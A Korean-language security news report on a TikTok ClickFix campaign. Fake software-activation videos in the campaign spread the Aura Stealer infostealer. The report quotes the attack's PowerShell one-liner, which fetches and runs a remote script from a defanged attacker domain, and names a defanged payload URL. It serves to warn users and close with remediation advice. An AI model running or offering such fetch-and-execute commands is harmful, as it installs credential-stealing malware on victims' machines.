사이버 범죄자들은 ​​TikTok 캠페인을 통해 인기 소프트웨어에 대한 무료 활성화 가이드라고 허위로 주장하는 비디오를 사용하여 정보를 훔치는 악성 코드를 배포하고 있습니다. 2025년 10월 19일에 확인된 현재 진행 중인 작업은 소셜 엔지니어링 방법을 사용하여 사용자를 속여 자신의 컴퓨터를 감염시킵니다. ISC 핸들러인 Xavier Mertens는 이 캠페인을 보고하면서 지난 5월 Trend Micro가 관찰한 작업과 유사하다고 지적했습니다. TikTok 비디오는 Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro 및 Discord Nitro와 같은 합법적인 소프트웨어를 활성화하기 위한 지침을 제공한다고 주장합니다. 이 캠페인은 또한 더 많은 청중을 유인하기 위해 ‘넷플릭스 프리미엄’, ‘스포티파이 프리미엄’ 등 조작된 서비스를 홍보합니다. 이 공격 기술은 ClickFix 공격으로 알려져 있으며, 사용자를 속여 악의적인 명령을 실행하도록 하는 유용한 지침을 제공합니다. 비디오에는 짧은 한 줄짜리 PowerShell 명령이 표시되며 시청자에게 관리자 권한으로 명령을 실행하도록 지시합니다. 표시된 명령 예는 다음과 같습니다. iex (irm slmgr[.]win/photoshop). “photoshop”과 같은 URL 내의 특정 프로그램 이름은 비디오에서 가장하는 소프트웨어와 일치하도록 변경됩니다. 사용자가 이 명령을 실행하면 PowerShell이 ​​원격 사이트에 연결됩니다. slmgr[.]win. 이 작업은 두 번째 PowerShell 스크립트를 검색하고 실행한 다음 Cloudflare 페이지에서 두 개의 실행 파일을 다운로드합니다. 첫 번째 파일은 다음에서 다운로드되었습니다. https://file-epq[.]pages[.]dev/updater.exeAura Stealer 악성코드의 변종입니다. Aura Stealer는 웹 브라우저, 인증 쿠키, 암호화폐 지갑 및 기타 애플리케이션의 로그인 데이터에서 저장된 자격 증명을 수집하도록 설계되었습니다. 이렇게 훔친 정보는 공격자에게 업로드되어 피해자의 계정에 대한 액세스 권한을 부여합니다. 이름이 지정된 두 번째 페이로드 source.exe도 다운로드됩니다. 이 실행 파일은 .NET Framework의 내장 Visual C# 컴파일러(csc.exe)를 사용하여 코드를 자체 컴파일하는 데 사용됩니다. 컴파일된 코드는 이후 메모리에 직접 주입되고 실행됩니다. 이 두 번째 페이로드의 구체적인 목적은 아직 결정되지 않았습니다. 이 비디오의 지침을 따른 사용자는 모든 자격 증명이 손상된 것으로 간주해야 하며 사용하는 모든 웹사이트 및 온라인 서비스의 비밀번호를 즉시 재설정하는 것이 좋습니다. ClickFix 공격은 지난 몇 년간 훨씬 더 흔해졌습니다. 랜섬웨어 및 암호화폐 도난과 관련된 캠페인에서 다양한 악성 코드 변종을 배포하는 데 사용됩니다. 일반적인 보안 관행에 따라 사용자는 웹 사이트의 텍스트를 복사하여 파일 탐색기 주소 표시줄, 명령 프롬프트, PowerShell, macOS 터미널 또는 Linux 셸을 포함한 운영 체제 대화 상자에서 실행해서는 안 됩니다.

  모든 Stray 메모리 위치

Source: TikTok 동영상은 가짜 소프트웨어 가이드를 통해 Aura Stealer를 확산시킵니다.